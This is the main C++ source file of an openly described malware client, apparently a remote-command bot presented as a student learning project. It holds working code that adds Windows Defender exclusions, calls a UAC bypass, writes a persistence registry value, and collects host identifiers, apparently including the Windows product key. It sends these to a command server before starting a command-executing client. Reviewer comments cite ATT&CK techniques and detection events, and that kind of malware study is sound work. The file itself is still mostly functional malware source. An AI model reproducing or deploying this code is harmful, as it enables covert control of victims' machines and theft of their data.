/*
This code is created for learning about malware. I have been using it to study hardware.
If I made any mistakes, I apologize for that. The code might not be perfect because I am also learning C++.
This project is part of a Science subject for the Presence Project.
Code written by Mikasuru (github.com/Mikasuru)
----------------------------------------------------------------
The project is built on a client-server model where a Node.js backend manages command distribution while C++ clients handle execution.
Main.cpp serves as the entry point, initializing core components and establishing webhook communications.
The server component (app.js) handles client registration, command distribution, and maintains the web interface.
*/
#include <iostream>
#include "Module/Logger.hpp"
#include "Extension/Payload/Payload.hpp"
#include "Extension/GetDevice/Hardware.hpp"
#include "Extension/Bot/HttpClient.hpp"
#include "Module/AutoElevate.hpp"
//#pragma comment(linker, "/SUBSYSTEM:windows /ENTRY:mainCRTStartup")
#include "Module/ConsoleManager.hpp"
#include "Module/ProcessMonitor.hpp"
#include "Module/AddonsManager.hpp"
// NOTE(review): a file-scope using-directive pulls all of std into this translation unit;
// the rest of the file mixes `string` and `std::string` for the same type.
using namespace std;
// Host identifiers captured at file scope. Each initializer calls into Hardware during
// static initialization, i.e. before main() starts and outside main()'s try/catch, so
// anything thrown here would not reach the handler at the end of main().
// main() declares locals with the same names (username .. windowsKey) that shadow these.
string username = Hardware::GetUsername();
string ipAddress = Hardware::GetIPAddress();
string machineID = Hardware::GetMachineID();
string rid = Hardware::GetRelativeIdentifier();
string windowsVersion = Hardware::GetWindowsVersion();
// NOTE(review): presumably the Windows product key (sensitive) - confirm against Hardware.hpp.
string windowsKey = Hardware::GetWindowsKey();
// Not referenced anywhere else in this file.
string profilePicPath = Hardware::GetUserProfilePicture();
// Registration endpoint, plain http:// on the local machine. Not referenced in this file;
// main() hard-codes the same host, port and path in its WinINet calls instead.
std::string url = "http://localhost:3000/register";
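// Reports whether the Windows Defender registry key can be opened for reading.
//
// Returns true when HKLM\SOFTWARE\Microsoft\Windows Defender opens with KEY_READ,
// false on any other status. This only shows that the key exists and is readable;
// it does not show that Defender is running or enabled.
bool isWindowsDefenderInstalled() {
    HKEY hKey = nullptr;
    if (RegOpenKeyExA(HKEY_LOCAL_MACHINE,
                      "SOFTWARE\\Microsoft\\Windows Defender",
                      0, KEY_READ, &hKey) != ERROR_SUCCESS) {
        return false;
    }
    // The handle is only needed for the existence check; close it so that
    // every successful call does not leak a registry handle.
    RegCloseKey(hKey);
    return true;
}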
// Writes `path` as a value name (REG_DWORD, data 0) under
// HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths, after checking that the
// Defender key exists. Every failure path returns silently. main() in this file does
// not call this function.
//
// Defender view: modifying antivirus exclusions is defense evasion (MITRE ATT&CK
// T1562.001, Impair Defenses: Disable or Modify Tools). Changes to Defender settings
// are typically recorded as Event ID 5007 in the Microsoft-Windows-Windows
// Defender/Operational log, and registry-value telemetry (e.g. Sysmon Event ID 13) on
// the Exclusions subkeys shows the writing process. A write here by anything other
// than the expected management tooling deserves an alert.
void Exclusion(const std::string& path) {
if (!isWindowsDefenderInstalled()) {
return;
}
// NOTE(review): the Win32 registry calls below report failure through return codes;
// nothing visible in this block is documented to throw, so the catch(...) looks unreachable.
try {
HKEY hKey;
const char* regPath = "SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths";
// Requests KEY_ALL_ACCESS although only a value write follows.
if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, regPath, 0, KEY_ALL_ACCESS, &hKey) != ERROR_SUCCESS) {
return;
}
DWORD value = 0;
// The result of RegSetValueExA is discarded, so the caller never learns whether the value was written.
RegSetValueExA(hKey, path.c_str(), 0, REG_DWORD, (BYTE*)&value, sizeof(value));
RegCloseKey(hKey);
}
catch (...) {
return;
}
}
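// Returns the full path of the running executable as reported by GetModuleFileNameA,
// or an empty string when the call fails.
//
// The buffer is zero-initialized and the failure return (0) is checked, so the
// function never builds a std::string from uninitialized stack memory. A path longer
// than MAX_PATH comes back truncated, as before.
// Note: main() in this file calls AutoElevate::getExecutablePath(), not this free function.
std::string getExecutablePath() {
    char path[MAX_PATH] = {};
    if (GetModuleFileNameA(NULL, path, MAX_PATH) == 0) {
        return std::string();
    }
    // Keep the buffer terminated even if the API filled it completely.
    path[MAX_PATH - 1] = '\0';
    return std::string(path);
}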
// Entry point. Visible flow:
//   1. Show the console window, log start-up, start ProcessMonitor on the executable path.
//   2. If not running as admin: call AutoElevate::bypassUAC(), on success write a
//      registry value named "Kukuri" holding the executable path, then exit with 0.
//   3. If running as admin: call elevatePrivileges()/setAutoRun(), initialize addons,
//      collect host identifiers, POST them as JSON to localhost:3000/register over
//      plain HTTP, then start HttpClient.
// Returns 0 on both normal paths, 1 when a std::exception is caught.
//
// Defender view, indicators visible in this function: the registry value name "Kukuri"
// under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, the User-Agent
// string "System Info Client", and a POST to /register on port 3000. Registry-value and
// network-connection telemetry (e.g. Sysmon Event IDs 13 and 3) attribute both to the process.
int main() {
try {
// Makes the console window visible.
HWND console = GetConsoleWindow();
ShowWindow(console, SW_SHOW);
Logger::getInstance()->info("Program started");
// NOTE(review): ProcessMonitor is defined outside this file; what it does with the path is not visible here.
ProcessMonitor::startMonitoring(AutoElevate::getExecutablePath());
if (!AutoElevate::isAdmin()) {
Logger::getInstance()->info("Not running as admin, attempting to elevate");
// bypassUAC() is defined in Module/AutoElevate.hpp; its mechanism is not visible here.
if (AutoElevate::bypassUAC()) {
Logger::getInstance()->info("UAC bypass successful");
HKEY hKey;
// The open result is checked, so the write is skipped if HKLM cannot be opened for KEY_SET_VALUE.
if (RegOpenKeyExA(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows",
0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
std::string exePath = AutoElevate::getExecutablePath();
// Stores the path as REG_SZ including its terminating NUL (length() + 1).
// The result of RegSetValueExA is not checked. What reads "Kukuri" is not visible in this file.
RegSetValueExA(hKey, "Kukuri", 0, REG_SZ,
(BYTE*)exePath.c_str(), exePath.length() + 1);
RegCloseKey(hKey);
}
}
else {
Logger::getInstance()->warning("UAC bypass failed");
}
// The non-admin instance always exits here, whether or not the bypass succeeded.
// NOTE(review): presumably bypassUAC() launches an elevated copy that takes the admin path - confirm.
return 0;
}
Logger::getInstance()->info("Running as admin");
AutoElevate::elevatePrivileges();
// A failure to set auto-run is logged and otherwise ignored.
if (!AutoElevate::setAutoRun()) {
Logger::getInstance()->warning("Failed to set auto run");
}
// These two lines only log; the HttpClient object is created at the end of the function.
Logger::getInstance()->load("Initialize HTTP Client..."); // Initialize
Logger::getInstance()->load("Starting HTTP Client..."); // Start
if (!AddonsManager::initializeAddons()) {
Logger::getInstance()->warning("Failed to initialize addons system");
}
// Collecting system information
// These locals shadow the file-scope globals of the same names, so Hardware is queried a second time.
std::string username = Hardware::GetUsername();
std::string ipAddress = Hardware::GetIPAddress();
std::string machineID = Hardware::GetMachineID();
std::string rid = Hardware::GetRelativeIdentifier();
std::string windowsVersion = Hardware::GetWindowsVersion();
std::string windowsKey = Hardware::GetWindowsKey();
// Creating JSON Object
// The payload carries host identifiers plus windowsKey.
// NOTE(review): windowsKey is presumably the Windows product key (sensitive) - confirm against Hardware.hpp.
nlohmann::json systemInfo = {
{"username", username},
{"ipAddress", ipAddress},
{"machineID", machineID},
{"rid", rid},
{"windowsVersion", windowsVersion},
{"windowsKey", windowsKey}
};
std::string jsonStr = systemInfo.dump();
// Sending information to server
// Direct (no proxy) WinINet session. Host "localhost", port 3000, INTERNET_SERVICE_HTTP
// and request flags 0 mean the body is sent unencrypted, and only to the local machine
// as built.
HINTERNET hInternet = InternetOpenA("System Info Client",
INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
if (hInternet) {
HINTERNET hConnect = InternetConnectA(hInternet, "localhost",
3000, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
if (hConnect) {
HINTERNET hRequest = HttpOpenRequestA(hConnect, "POST", "/register",
NULL, NULL, NULL, 0, 0);
if (hRequest) {
std::string headers = "Content-Type: application/json\r\n";
// The result of HttpSendRequestA is ignored and no response is read, so a failed
// registration goes unnoticed.
HttpSendRequestA(hRequest, headers.c_str(), headers.length(),
(LPVOID)jsonStr.c_str(), jsonStr.length());
InternetCloseHandle(hRequest);
}
InternetCloseHandle(hConnect);
}
InternetCloseHandle(hInternet);
}
// NOTE(review): HttpClient is defined in Extension/Bot/HttpClient.hpp; by the file header's
// description it presumably receives and executes server commands - confirm there.
HttpClient client;
client.start();
return 0;
}
// Only std::exception and types derived from it are handled; anything else propagates out of main().
catch (const exception& e) {
Logger::getInstance()->expection(e.what());
return 1;
}
}